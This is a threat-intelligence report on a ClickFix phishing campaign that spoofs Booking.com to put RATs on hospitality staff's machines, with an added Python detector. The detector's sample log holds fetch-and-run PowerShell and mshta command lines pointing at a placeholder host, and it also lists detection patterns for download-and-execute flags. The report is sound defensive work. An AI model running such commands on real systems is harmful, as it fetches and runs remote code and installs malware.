Full Report
A phishing campaign spoofing Booking.com has been observed targeting the hospitality sector, using ClickFix to install malware.
Analysis Summary
# Tool/Technique: ClickFix CAPTCHA System (Delivery Mechanism)
## Overview
The ClickFix system is being leveraged within a phishing campaign impersonating Booking.com to trick hospitality industry personnel into executing malicious scripts on Windows devices, resulting in malware installation, primarily Remote Access Trojans (RATs).
## Technical Details
- Type: Technique (social engineering / delivery mechanism used to frame the attack)
- Platform: Windows devices
- Capabilities: Deceptively prompts victims to complete "verification steps" via a counterfeit CAPTCHA page, which involves copying and executing a script via Windows shortcuts to deploy malware.
- First Seen: Active since November 2024, peaking in March 2025.
## MITRE ATT&CK Mapping
- T1566 - Phishing
  - T1566.001 - Spearphishing Attachment
  - T1566.002 - Spearphishing Link
- T1204 - User Execution
  - T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
  - T1059.003 - Windows Command Shell (implied by executing scripts via shortcuts)
## Functionality
### Core Capabilities
- Social engineering via emails spoofing Booking.com reservation/guest issue requests.
- Hosting a deceptive CAPTCHA page (ClickFix) designed to bypass user caution.
- Coercing users into actively executing malicious code via Windows shortcuts.
### Advanced Features
- The mechanism focuses on achieving execution by framing the final step as a necessary, non-suspicious "verification" rather than a direct download/execution prompt.
## Indicators of Compromise
- File Hashes: [None provided in the context]
- File Names: [None provided in the context]
- Registry Keys: [None provided in the context]
- Network Indicators: [No specific C2 or initial delivery domains/IPs provided in the context]
- Behavioral Indicators: User interaction involving copying and executing scripts initiated from a Windows shortcut following interaction with a CAPTCHA link.
## Associated Threat Actors
- Threat actors using this specific campaign variation are noted by Cofense Intelligence, but a named APT or established cybercrime group is not specified in the provided text.
## Detection Methods
- Signature-based detection: [Not specified for the specific delivery script, but payloads are detectable]
- Behavioral detection: Monitoring for unusual script execution initiated immediately after user interaction with links related to booking platforms, particularly when involving Windows shortcuts.
- YARA rules: [Not specified in the context]
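As an added illustration of the behavioral detection described above (example code written for this page, not from Cofense or the underlying report), the following Python script scores constructed, Sysmon-style process-creation records for the ClickFix pattern: a script host launched from the interactive shell (the parent of a Run dialog or shortcut launch) whose command line also carries a hidden-window, policy-bypass, encoded-command, download/eval or URL signal. The log format, usernames, paths and the `example.invalid` URL are all placeholders constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records in a key=value layout loosely modelled on a
# Sysmon Event ID 1 export. These are NOT real campaign telemetry; every value is a
# placeholder made up for this example.
SAMPLE_LOG = r'''
id=1 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" parent="C:\Windows\explorer.exe" user="HOTEL\frontdesk" cmdline="powershell -w hidden -ep bypass iex (iwr http://example.invalid/ca.txt)"
id=2 image="C:\Windows\System32\mshta.exe" parent="C:\Windows\explorer.exe" user="HOTEL\frontdesk" cmdline="mshta http://example.invalid/verify"
id=3 image="C:\Program Files\Google\Chrome\Application\chrome.exe" parent="C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" user="HOTEL\frontdesk" cmdline="chrome.exe https://admin.booking.com/"
id=4 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" parent="C:\Windows\System32\services.exe" user="NT AUTHORITY\SYSTEM" cmdline="powershell -File C:\scripts\backup.ps1"
id=5 image="C:\Windows\System32\cmd.exe" parent="C:\Windows\explorer.exe" user="HOTEL\frontdesk" cmdline="cmd /c dir"
'''

# Script hosts that ClickFix-style lures typically ask the victim to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# The desktop shell is the parent of anything started via the Run dialog or a shortcut.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line signals that are rare in legitimate interactive use but common in
# copy-and-paste lures. Each entry is (human-readable reason, compiled pattern).
SUSPICIOUS_ARGS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-e(?:xecutionpolicy)?p?\s+bypass", re.I)),
    ("encoded command", re.compile(r"-(?:e|en|enc|encodedcommand)\b", re.I)),
    ("download/eval primitive", re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I)),
    ("URL in command line", re.compile(r"https?://", re.I)),
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class ProcessEvent:
    id: int
    image: str
    parent: str
    user: str
    cmdline: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one key=value record; quoted values may contain spaces."""
    fields = {k: v.strip('"') for k, v in KV.findall(line)}
    return ProcessEvent(
        id=int(fields["id"]),
        image=fields["image"],
        parent=fields["parent"],
        user=fields["user"],
        cmdline=fields["cmdline"],
    )


def analyze(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like a ClickFix-style launch, or [] if it does not.

    Both signals are required: a script host spawned by the interactive shell AND at
    least one suspicious command-line argument. Either alone is too noisy (admins run
    PowerShell from the desktop; services run scripts with odd flags)."""
    image, parent = basename(ev.image), basename(ev.parent)
    if image not in SCRIPT_HOSTS or parent not in INTERACTIVE_PARENTS:
        return []
    arg_hits = [reason for reason, pat in SUSPICIOUS_ARGS if pat.search(ev.cmdline)]
    if not arg_hits:
        return []
    return [f"{image} spawned by {parent} (Run dialog / shortcut launch)"] + arg_hits


def detect(log_text: str) -> dict[int, list[str]]:
    """Run the analyzer over every record; map flagged event ids to their reasons."""
    flagged: dict[int, list[str]] = {}
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        reasons = analyze(ev)
        if reasons:
            flagged[ev.id] = reasons
    return flagged


if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_LOG).items():
        print(f"event {event_id}: " + "; ".join(reasons))
```

In the constructed sample, events 1 and 2 are flagged (explorer.exe launching powershell.exe with hidden-window, bypass and download signals, and mshta.exe with a URL), while the service-launched backup script and the plain `cmd /c dir` from the desktop are not. In a real deployment the same two-signal rule maps onto a SIEM query over Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled.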
## Mitigation Strategies
- Prevention measures: Strict user training regarding unsolicited emails, especially those related to critical business applications like reservation confirmations or guest interactions.
- Hardening recommendations: Implement application control to restrict the execution of scripts or compiled binaries originating from unusual paths or user actions, especially via interactive shortcuts.
## Related Tools/Techniques
- XWorm RAT (Common payload)
- Pure Logs Stealer (Common payload)
- DanaBot (Common payload)